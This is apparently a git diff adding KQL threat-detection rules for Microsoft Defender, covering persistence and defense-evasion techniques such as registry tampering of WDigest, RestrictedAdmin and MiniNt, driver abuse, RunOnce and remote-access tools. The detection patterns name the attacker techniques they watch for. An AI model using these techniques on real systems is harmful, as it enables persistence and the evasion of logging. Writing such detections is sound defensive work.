b/KQL/rules/Persistence/powershell_script_dropped_via_powershell_exe.kql @@ -0,0 +1,12 @@ +// Title: PowerShell Script Dropped Via PowerShell.EXE +// Author: frack113 +// Date: 2023-05-09 +// Level: low +// Description: Detects PowerShell creating a PowerShell file (.ps1). While often times this behavior is benign, sometimes it can be a sign of a dropper script trying to achieve persistence. +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - False positives will differ depending on the environment and scripts used. Apply additional filters accordingly. + +DeviceFileEvents +| where ((InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe") and FolderPath endswith ".ps1") and (not(((FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath startswith "C:\\Users\\") or FolderPath contains "__PSScriptPolicyTest_" or FolderPath startswith "C:\\Windows\\Temp\\"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/process_explorer_driver_creation_by_non_sysinternals_binary.kql b/KQL/rules/Persistence/process_explorer_driver_creation_by_non_sysinternals_binary.kql new file mode 100644 index 00000000..a69d2037 --- /dev/null +++ b/KQL/rules/Persistence/process_explorer_driver_creation_by_non_sysinternals_binary.kql @@ -0,0 +1,14 @@ +// Title: Process Explorer Driver Creation By Non-Sysinternals Binary +// Author: Florian Roth (Nextron Systems) +// Date: 2023-05-05 +// Level: high +// Description: Detects creation of the Process Explorer drivers by processes other than Process Explorer (procexp) itself. +Hack tools or malware may use the Process Explorer driver to elevate privileges, drops it to disk for a few moments, runs a service using that driver and removes it afterwards. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1068 +// False Positives: +// - Some false positives may occur with legitimate renamed process explorer binaries + +DeviceFileEvents +| where (FolderPath contains "\\PROCEXP" and FolderPath endswith ".sys") and (not((InitiatingProcessFolderPath endswith "\\procexp.exe" or InitiatingProcessFolderPath endswith "\\procexp64.exe"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/process_monitor_driver_creation_by_non_sysinternals_binary.kql b/KQL/rules/Persistence/process_monitor_driver_creation_by_non_sysinternals_binary.kql new file mode 100644 index 00000000..12cfd2b6 --- /dev/null +++ b/KQL/rules/Persistence/process_monitor_driver_creation_by_non_sysinternals_binary.kql @@ -0,0 +1,12 @@ +// Title: Process Monitor Driver Creation By Non-Sysinternals Binary +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-05-05 +// Level: medium +// Description: Detects creation of the Process Monitor driver by processes other than Process Monitor (procmon) itself. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.t1068 +// False Positives: +// - Some false positives may occur with legitimate renamed process monitor binaries + +DeviceFileEvents +| where (FolderPath contains "\\procmon" and FolderPath endswith ".sys") and (not((InitiatingProcessFolderPath endswith "\\procmon.exe" or InitiatingProcessFolderPath endswith "\\procmon64.exe"))) \ No newline at end of file diff --git a/KQL/rules/Persistence/pua_system_informer_execution.kql b/KQL/rules/Persistence/pua_system_informer_execution.kql new file mode 100644 index 00000000..47ec5b70 --- /dev/null +++ b/KQL/rules/Persistence/pua_system_informer_execution.kql @@ -0,0 +1,12 @@ +// Title: PUA - System Informer Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2023-05-08 +// Level: medium +// Description: Detects the execution of System Informer, a task manager tool to view and manipulate processes, kernel options and other low level operations +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.privilege-escalation, attack.discovery, attack.defense-evasion, attack.t1082, attack.t1564, attack.t1543 +// False Positives: +// - System Informer is regularly used legitimately by system administrators or developers. Apply additional filters accordingly + +DeviceProcessEvents +| where FolderPath endswith "\\SystemInformer.exe" or ProcessVersionInfoOriginalFileName =~ "SystemInformer.exe" or ProcessVersionInfoFileDescription =~ "System Informer" or ProcessVersionInfoProductName =~ "System Informer" or (MD5 startswith "19426363A37C03C3ED6FEDF57B6696EC" or SHA1 startswith "8B12C6DA8FAC0D5E8AB999C31E5EA04AF32D53DC" or SHA256 startswith "8EE9D84DE50803545937A63C686822388A3338497CDDB660D5D69CF68B68F287") \ No newline at end of file diff --git a/KQL/rules/Persistence/redmimicry_winnti_playbook_registry_manipulation.kql b/KQL/rules/Persistence/redmimicry_winnti_playbook_registry_manipulation.kql new file mode 100644 index 00000000..b3972ec5 --- /dev/null +++ b/KQL/rules/Persistence/redmimicry_winnti_playbook_registry_manipulation.kql @@ -0,0 +1,10 @@ +// Title: RedMimicry Winnti Playbook Registry Manipulation +// Author: Alexander Rausch +// Date: 2020-06-24 +// Level: high +// Description: Detects actions caused by the RedMimicry Winnti playbook +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents +| where RegistryKey contains "HKLM\\SOFTWARE\\Microsoft\\HTMLHelp\\data" \ No newline at end of file diff --git a/KQL/rules/Persistence/reg_add_suspicious_paths.kql b/KQL/rules/Persistence/reg_add_suspicious_paths.kql new file mode 100644 index 00000000..de19f182 --- /dev/null +++ b/KQL/rules/Persistence/reg_add_suspicious_paths.kql @@ -0,0 +1,12 @@ +// Title: Reg Add Suspicious Paths +// Author: frack113, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-08-19 +// Level: high +// Description: Detects when an adversary uses the reg.exe utility to add or modify new keys or subkeys +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112, attack.t1562.001 +// False Positives: +// - Rare legitimate add to registry via cli (to these locations) + +DeviceProcessEvents +| where (ProcessCommandLine contains "\\AppDataLow\\Software\\Microsoft\\" or ProcessCommandLine contains "\\Policies\\Microsoft\\Windows\\OOBE" or ProcessCommandLine contains "\\Policies\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" or ProcessCommandLine contains "\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon" or ProcessCommandLine contains "\\CurrentControlSet\\Control\\SecurityProviders\\WDigest" or ProcessCommandLine contains "\\Microsoft\\Windows Defender\\") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") \ No newline at end of file diff --git a/KQL/rules/Persistence/register_new_ifiltre_for_persistence.kql b/KQL/rules/Persistence/register_new_ifiltre_for_persistence.kql new file mode 100644 index 00000000..7b51cf2f --- /dev/null +++ b/KQL/rules/Persistence/register_new_ifiltre_for_persistence.kql @@ -0,0 +1,14 @@ +// Title: Register New IFiltre For Persistence +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-07-21 +// Level: medium +// Description: Detects when an attacker registers a new IFilter for an extension. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. +You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files. + +// MITRE Tactic: Persistence +// Tags: attack.persistence +// False Positives: +// - Legitimate registration of IFilters by the OS or software + +DeviceRegistryEvents +| where ((RegistryKey contains "\\SOFTWARE\\Classes\\CLSID" and RegistryKey contains "\\PersistentAddinsRegistered\\{89BCB740-6119-101A-BCB7-00DD010655AF}") or (RegistryKey contains "\\SOFTWARE\\Classes\\." and RegistryKey contains "\\PersistentHandler")) and (not(((RegistryKey endswith "\\CLSID\\{4F46F75F-199F-4C63-8B7D-86D48FE7970C}*" or RegistryKey endswith "\\CLSID\\{4887767F-7ADC-4983-B576-88FB643D6F79}*" or RegistryKey endswith "\\CLSID\\{D3B41FA1-01E3-49AF-AA25-1D0D824275AE}*" or RegistryKey endswith "\\CLSID\\{72773E1A-B711-4d8d-81FA-B9A43B0650DD}*" or RegistryKey endswith "\\CLSID\\{098f2470-bae0-11cd-b579-08002b30bfeb}*" or RegistryKey endswith "\\CLSID\\{1AA9BF05-9A97-48c1-BA28-D9DCE795E93C}*" or RegistryKey endswith "\\CLSID\\{2e2294a9-50d7-4fe7-a09f-e6492e185884}*" or RegistryKey endswith "\\CLSID\\{34CEAC8D-CBC0-4f77-B7B1-8A60CB6DA0F7}*" or RegistryKey endswith "\\CLSID\\{3B224B11-9363-407e-850F-C9E1FFACD8FB}*" or RegistryKey endswith "\\CLSID\\{3DDEB7A4-8ABF-4D82-B9EE-E1F4552E95BE}*" or RegistryKey endswith "\\CLSID\\{5645C8C1-E277-11CF-8FDA-00AA00A14F93}*" or RegistryKey endswith "\\CLSID\\{5645C8C4-E277-11CF-8FDA-00AA00A14F93}*" or RegistryKey endswith "\\CLSID\\{58A9EBF6-5755-4554-A67E-A2467AD1447B}*" or RegistryKey endswith "\\CLSID\\{5e941d80-bf96-11cd-b579-08002b30bfeb}*" or RegistryKey endswith "\\CLSID\\{698A4FFC-63A3-4E70-8F00-376AD29363FB}*" or RegistryKey endswith "\\CLSID\\{7E9D8D44-6926-426F-AA2B-217A819A5CCE}*" or RegistryKey endswith "\\CLSID\\{8CD34779-9F10-4f9b-ADFB-B3FAEABDAB5A}*" or RegistryKey endswith "\\CLSID\\{9694E38A-E081-46ac-99A0-8743C909ACB6}*" or RegistryKey endswith "\\CLSID\\{98de59a0-d175-11cd-a7bd-00006b827d94}*" or RegistryKey endswith "\\CLSID\\{AA10385A-F5AA-4EFF-B3DF-71B701E25E18}*" or RegistryKey endswith "\\CLSID\\{B4132098-7A03-423D-9463-163CB07C151F}*" or RegistryKey endswith "\\CLSID\\{d044309b-5da6-4633-b085-4ed02522e5a5}*" or RegistryKey endswith "\\CLSID\\{D169C14A-5148-4322-92C8-754FC9D018D8}*" or RegistryKey endswith "\\CLSID\\{DD75716E-B42E-4978-BB60-1497B92E30C4}*" or RegistryKey endswith "\\CLSID\\{E2F83EED-62DE-4A9F-9CD0-A1D40DCD13B6}*" or RegistryKey endswith "\\CLSID\\{E772CEB3-E203-4828-ADF1-765713D981B8}*" or RegistryKey contains "\\CLSID\\{eec97550-47a9-11cf-b952-00aa0051fe20}" or RegistryKey endswith "\\CLSID\\{FB10BD80-A331-4e9e-9EB7-00279903AD99}*") or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/registry_explorer_policy_modification.kql b/KQL/rules/Persistence/registry_explorer_policy_modification.kql new file mode 100644 index 00000000..a14b0226 --- /dev/null +++ b/KQL/rules/Persistence/registry_explorer_policy_modification.kql @@ -0,0 +1,12 @@ +// Title: Registry Explorer Policy Modification +// Author: frack113 +// Date: 2022-03-18 +// Level: medium +// Description: Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique) +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Legitimate admin script + +DeviceRegistryEvents +| where RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoLogOff" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDesktop" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFind" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoControlPanel" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoFileMenu" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoClose" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoSetTaskbar" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoPropertiesMyDocuments" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoTrayContextMenu") \ No newline at end of file diff --git a/KQL/rules/Persistence/registry_hide_function_from_user.kql b/KQL/rules/Persistence/registry_hide_function_from_user.kql new file mode 100644 index 00000000..0820c432 --- /dev/null +++ b/KQL/rules/Persistence/registry_hide_function_from_user.kql @@ -0,0 +1,12 @@ +// Title: Registry Hide Function from User +// Author: frack113 +// Date: 2022-03-18 +// Level: medium +// Description: Detects registry modifications that hide internal tools or functions from the user (malware like Agent Tesla, Hermetic Wiper uses this technique) +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Legitimate admin script + +DeviceRegistryEvents +| where (RegistryValueData =~ "DWORD (0x00000000)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowInfoTip" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\ShowCompColor")) or (RegistryValueData =~ "DWORD (0x00000001)" and (RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideClock" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAHealth" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCANetwork" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAPower" or RegistryKey endswith "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\HideSCAVolume")) \ No newline at end of file diff --git a/KQL/rules/Persistence/registry_manipulation_via_wmi_stdregprov.kql b/KQL/rules/Persistence/registry_manipulation_via_wmi_stdregprov.kql new file mode 100644 index 00000000..1f0aaf0a --- /dev/null +++ b/KQL/rules/Persistence/registry_manipulation_via_wmi_stdregprov.kql @@ -0,0 +1,15 @@ +// Title: Registry Manipulation via WMI Stdregprov +// Author: Daniel Koifman (KoifSec) +// Date: 2025-07-30 +// Level: medium +// Description: Detects the usage of wmic.exe to manipulate Windows registry via the WMI StdRegProv class. +This behaviour could be potentially suspicious because it uses an alternative method to modify registry keys instead of legitimate registry tools like reg.exe or regedit.exe. +Attackers specifically choose this technique to evade detection and bypass security monitoring focused on traditional registry modification commands. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.execution, attack.defense-evasion, attack.discovery, attack.t1047, attack.t1112, attack.t1012 +// False Positives: +// - Legitimate administrative activity + +DeviceProcessEvents +| where (ProcessCommandLine contains "call" and ProcessCommandLine contains "stdregprov") and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/KQL/rules/Persistence/registry_modification_to_hidden_file_extension.kql b/KQL/rules/Persistence/registry_modification_to_hidden_file_extension.kql new file mode 100644 index 00000000..ba5213dd --- /dev/null +++ b/KQL/rules/Persistence/registry_modification_to_hidden_file_extension.kql @@ -0,0 +1,12 @@ +// Title: Registry Modification to Hidden File Extension +// Author: frack113 +// Date: 2022-01-22 +// Level: medium +// Description: Hides the file extension through modification of the registry +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1137 +// False Positives: +// - Administrative scripts + +DeviceRegistryEvents +| where (RegistryValueData =~ "DWORD (0x00000002)" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden") or (RegistryValueData =~ "DWORD (0x00000001)" and RegistryKey endswith "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt") \ No newline at end of file diff --git a/KQL/rules/Persistence/registry_modification_via_regini_exe.kql b/KQL/rules/Persistence/registry_modification_via_regini_exe.kql new file mode 100644 index 00000000..b53b13d4 --- /dev/null +++ b/KQL/rules/Persistence/registry_modification_via_regini_exe.kql @@ -0,0 +1,12 @@ +// Title: Registry Modification Via Regini.EXE +// Author: Eli Salem, Sander Wiebing, oscd.community +// Date: 2020-10-08 +// Level: low +// Description: Detects the execution of regini.exe which can be used to modify registry keys, the changes are imported from one or more text files. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.t1112, attack.defense-evasion +// False Positives: +// - Legitimate modification of keys + +DeviceProcessEvents +| where (FolderPath endswith "\\regini.exe" or ProcessVersionInfoOriginalFileName =~ "REGINI.EXE") and (not(ProcessCommandLine matches regex ":[^ \\\\]")) \ No newline at end of file diff --git a/KQL/rules/Persistence/remote_access_tool_anydesk_incoming_connection.kql b/KQL/rules/Persistence/remote_access_tool_anydesk_incoming_connection.kql new file mode 100644 index 00000000..12c4e84e --- /dev/null +++ b/KQL/rules/Persistence/remote_access_tool_anydesk_incoming_connection.kql @@ -0,0 +1,13 @@ +// Title: Remote Access Tool - AnyDesk Incoming Connection +// Author: @d4ns4n_ (Wuerth-Phoenix) +// Date: 2024-09-02 +// Level: medium +// Description: Detects incoming connections to AnyDesk. This could indicate a potential remote attacker trying to connect to a listening instance of AnyDesk and use it as potential command and control channel. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.command-and-control, attack.t1219.002 +// False Positives: +// - Legitimate incoming connections (e.g. sysadmin activity). Most of the time I would expect outgoing connections (initiated locally). + +DeviceNetworkEvents +| where InitiatingProcessFolderPath endswith "\\AnyDesk.exe" or InitiatingProcessFolderPath endswith "\\AnyDeskMSI.exe" \ No newline at end of file diff --git a/KQL/rules/Persistence/remote_access_tool_screenconnect_installation_execution.kql b/KQL/rules/Persistence/remote_access_tool_screenconnect_installation_execution.kql new file mode 100644 index 00000000..487322ea --- /dev/null +++ b/KQL/rules/Persistence/remote_access_tool_screenconnect_installation_execution.kql @@ -0,0 +1,12 @@ +// Title: Remote Access Tool - ScreenConnect Installation Execution +// Author: Florian Roth (Nextron Systems) +// Date: 2021-02-11 +// Level: medium +// Description: Detects ScreenConnect program starts that establish a remote access to a system. +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.initial-access, attack.t1133 +// False Positives: +// - Legitimate use by administrative staff + +DeviceProcessEvents +| where ProcessCommandLine contains "e=Access&" and ProcessCommandLine contains "y=Guest&" and ProcessCommandLine contains "&p=" and ProcessCommandLine contains "&c=" and ProcessCommandLine contains "&k=" \ No newline at end of file diff --git a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_linux_host.kql b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_linux_host.kql new file mode 100644 index 00000000..55485657 --- /dev/null +++ b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_linux_host.kql @@ -0,0 +1,14 @@ +// Title: Remote Access Tool - Team Viewer Session Started On Linux Host +// Author: Josh Nickels, Qi Nan +// Date: 2024-03-11 +// Level: low +// Description: Detects the command line executed when TeamViewer starts a session started by a remote host. +Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.initial-access, attack.t1133 +// False Positives: +// - Legitimate usage of TeamViewer + +DeviceProcessEvents +| where ProcessCommandLine endswith "/TeamViewer_Desktop --IPCport 5939 --Module 1" and FolderPath endswith "/TeamViewer_Desktop" and InitiatingProcessFolderPath endswith "/TeamViewer_Service" \ No newline at end of file diff --git a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_macos_host.kql b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_macos_host.kql new file mode 100644 index 00000000..65bc92f3 --- /dev/null +++ b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_macos_host.kql @@ -0,0 +1,14 @@ +// Title: Remote Access Tool - Team Viewer Session Started On MacOS Host +// Author: Josh Nickels, Qi Nan +// Date: 2024-03-11 +// Level: low +// Description: Detects the command line executed when TeamViewer starts a session started by a remote host. +Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.initial-access, attack.t1133 +// False Positives: +// - Legitimate usage of TeamViewer + +DeviceProcessEvents +| where ProcessCommandLine endswith "/TeamViewer_Desktop --IPCport 5939 --Module 1" and FolderPath endswith "/TeamViewer_Desktop" and InitiatingProcessFolderPath endswith "/TeamViewer_Service" \ No newline at end of file diff --git a/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_windows_host.kql b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_windows_host.kql new file mode 100644 index 00000000..b101c7c0 --- /dev/null +++ b/KQL/rules/Persistence/remote_access_tool_team_viewer_session_started_on_windows_host.kql @@ -0,0 +1,14 @@ +// Title: Remote Access Tool - Team Viewer Session Started On Windows Host +// Author: Josh Nickels, Qi Nan +// Date: 2024-03-11 +// Level: low +// Description: Detects the command line executed when TeamViewer starts a session started by a remote host. +Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.initial-access, attack.t1133 +// False Positives: +// - Legitimate usage of TeamViewer + +DeviceProcessEvents +| where ProcessCommandLine endswith "TeamViewer_Desktop.exe --IPCport 5939 --Module 1" and FolderPath =~ "TeamViewer_Desktop.exe" and InitiatingProcessFolderPath =~ "TeamViewer_Service.exe" \ No newline at end of file diff --git a/KQL/rules/Persistence/removal_of_potential_com_hijacking_registry_keys.kql b/KQL/rules/Persistence/removal_of_potential_com_hijacking_registry_keys.kql new file mode 100644 index 00000000..80578c80 --- /dev/null +++ b/KQL/rules/Persistence/removal_of_potential_com_hijacking_registry_keys.kql @@ -0,0 +1,14 @@ +// Title: Removal of Potential COM Hijacking Registry Keys +// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research) +// Date: 2020-05-02 +// Level: medium +// Description: Detects any deletion of entries in ".*\shell\open\command" registry keys. +These registry keys might have been used for COM hijacking activities by a threat actor or an attacker and the deletion could indicate steps to remove its tracks. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Legitimate software (un)installations are known to cause false positives. Please add them as a filter when encountered + +DeviceRegistryEvents +| where RegistryKey endswith "\\shell\\open\\command" and (not((InitiatingProcessFolderPath endswith "C:\\Windows\\explorer.exe" or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or (InitiatingProcessFolderPath in~ ("C:\\Windows\\System32\\msiexec.exe", "C:\\Windows\\SysWOW64\\msiexec.exe")) or InitiatingProcessFolderPath =~ "C:\\Windows\\System32\\OpenWith.exe" or InitiatingProcessFolderPath =~ "C:\\Windows\\system32\\svchost.exe"))) and (not((((InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Avira\\Antivirus\\", "C:\\Program Files\\Avira\\Antivirus\\")) and (RegistryKey endswith "\\CLSID\\{305CA226-D286-468e-B848-2B2E8E697B74}\\Shell\\Open\\Command" or RegistryKey endswith "\\AntiVir.Keyfile\\shell\\open\\command")) or (InitiatingProcessFolderPath endswith "\\reg.exe" and RegistryKey endswith "\\Discord\\shell\\open\\command") or (InitiatingProcessFolderPath endswith "\\Dropbox.exe" and RegistryKey contains "\\Dropbox.") or (InitiatingProcessFolderPath endswith "C:\\eclipse\\eclipse.exe" and RegistryKey contains "_Classes\\eclipse+") or InitiatingProcessFolderPath contains "\\Microsoft\\EdgeUpdate\\Install" or (InitiatingProcessFolderPath endswith "\\Everything.exe" and RegistryKey contains "\\Everything.") or ((InitiatingProcessFolderPath contains "AppData\\Local\\Temp" and InitiatingProcessFolderPath contains "\\setup.exe") or (InitiatingProcessFolderPath contains "\\Temp\\is-" and InitiatingProcessFolderPath contains "\\target.tmp")) or (InitiatingProcessFolderPath endswith "\\installer.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Java\\" and RegistryKey contains "\\Classes\\WOW6432Node\\CLSID\\{4299124F-F2C3-41b4-9C73-9236B2AD0E8F}") or InitiatingProcessFolderPath endswith "\\ninite.exe" or (InitiatingProcessFolderPath contains "peazip" and RegistryKey contains "\\PeaZip.") or (InitiatingProcessFolderPath endswith "\\Spotify.exe" and RegistryKey endswith "\\Spotify\\shell\\open\\command") or (InitiatingProcessFolderPath contains "\\Temp" and InitiatingProcessFolderPath contains "\\TeamViewer") or InitiatingProcessFolderPath startswith "C:\\Windows\\Installer\\MSI" or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Temp\\Wireshark_uninstaller.exe" and RegistryKey endswith "\\wireshark-capture-file*")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering.kql b/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering.kql new file mode 100644 index 00000000..1c40d43f --- /dev/null +++ b/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering.kql @@ -0,0 +1,13 @@ +// Title: RestrictedAdminMode Registry Value Tampering +// Author: frack113 +// Date: 2023-01-13 +// Level: high +// Description: Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. +RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. +This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceRegistryEvents +| where RegistryKey endswith "System\\CurrentControlSet\\Control\\Lsa\\DisableRestrictedAdmin" \ No newline at end of file diff --git a/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering_proccreation.kql b/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering_proccreation.kql new file mode 100644 index 00000000..382a86be --- /dev/null +++ b/KQL/rules/Persistence/restrictedadminmode_registry_value_tampering_proccreation.kql @@ -0,0 +1,13 @@ +// Title: RestrictedAdminMode Registry Value Tampering - ProcCreation +// Author: frack113 +// Date: 2023-01-13 +// Level: high +// Description: Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. +RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. +This prevents your credentials from being harvested during the initial connection process if the remote server has been compromise + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceProcessEvents +| where ProcessCommandLine contains "\\System\\CurrentControlSet\\Control\\Lsa" and ProcessCommandLine contains "DisableRestrictedAdmin" \ No newline at end of file diff --git a/KQL/rules/Persistence/run_once_task_configuration_in_registry.kql b/KQL/rules/Persistence/run_once_task_configuration_in_registry.kql new file mode 100644 index 00000000..22fa6a98 --- /dev/null +++ b/KQL/rules/Persistence/run_once_task_configuration_in_registry.kql @@ -0,0 +1,12 @@ +// Title: Run Once Task Configuration in Registry +// Author: Avneet Singh @v3t0_, oscd.community +// Date: 2020-11-15 +// Level: medium +// Description: Rule to detect the configuration of Run Once registry key. Configured payload can be run by runonce.exe /AlternateShellStartup +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 +// False Positives: +// - Legitimate modification of the registry key by legitimate program + +DeviceRegistryEvents +| where (RegistryKey contains "\\Microsoft\\Active Setup\\Installed Components" and RegistryKey endswith "\\StubPath") and (not(((RegistryValueData contains "C:\\Program Files\\Google\\Chrome\\Application\\" and RegistryValueData contains "\\Installer\\chrmstp.exe\" --configure-user-settings --verbose-logging --system-level") or ((RegistryValueData contains "C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\" or RegistryValueData contains "C:\\Program Files\\Microsoft\\Edge\\Application\\") and RegistryValueData endswith "\\Installer\\setup.exe\" --configure-user-settings --verbose-logging --system-level --msedge --channel=stable")))) \ No newline at end of file diff --git a/KQL/rules/Persistence/run_once_task_execution_as_configured_in_registry.kql b/KQL/rules/Persistence/run_once_task_execution_as_configured_in_registry.kql new file mode 100644 index 00000000..d4510f26 --- /dev/null +++ b/KQL/rules/Persistence/run_once_task_execution_as_configured_in_registry.kql @@ -0,0 +1,10 @@ +// Title: Run Once Task Execution as Configured in Registry +// Author: Avneet Singh @v3t0_, oscd.community, Christopher Peacock @SecurePeacock (updated) +// Date: 2020-10-18 +// Level: low +// Description: This rule detects the execution of Run Once task as configured in the registry +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1112 + +DeviceProcessEvents +| where (ProcessCommandLine contains "/AlternateShellStartup" or ProcessCommandLine endswith "/r") and (FolderPath endswith "\\runonce.exe" or ProcessVersionInfoFileDescription =~ "Run Once Wrapper") \ No newline at end of file diff --git a/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_process.kql b/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_process.kql new file mode 100644 index 00000000..33fe2edb --- /dev/null +++ b/KQL/rules/Persistence/security_event_logging_disabled_via_minint_registry_key_process.kql @@ -0,0 +1,15 @@ +// Title: Security Event Logging Disabled via MiniNt Registry Key - Process +// Author: Swachchhanda Shrawan Poudel (Nextron Systems) +// Date: 2025-04-09 +// Level: high +// Description: Detects attempts to disable security event logging by adding the `MiniNt` registry key. +This key is used to disable the Windows Event Log service, which collects and stores event logs from the operating system and applications. +Adversaries may want to disable this service to prevent logging of security events that could be used to detect their activities. + +// MITRE Tactic: Persistence +// Tags: attack.persistence, attack.defense-evasion, attack.t1562.002, attack.t1112, car.2022-03-001 +// False Positives: +// - Highly Unlikely + +DeviceProcessEvents +| where ((ProcessCommandLine contains " add " and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\MiniNt") and (FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe")) or ((ProcessCommandLine contains "New-Item " or ProcessCommandLine contains "ni ") and ProcessCommandLine contains "\\SYSTEM\\CurrentControlSet\\Control\\MiniNt" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith 